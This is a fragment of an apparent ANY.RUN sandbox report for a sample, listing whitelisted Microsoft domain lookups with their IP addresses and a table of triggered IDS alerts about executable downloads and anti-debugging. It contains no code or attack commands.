crl.microsoft.com
  • 23.216.77.39
  • 23.216.77.25
  • 23.216.77.27
  • 23.216.77.7
  • 23.216.77.13
  • 23.216.77.11
  • 23.216.77.21
  • 23.216.77.12
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
Misc activity
ET INFO Packed Executable Download
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b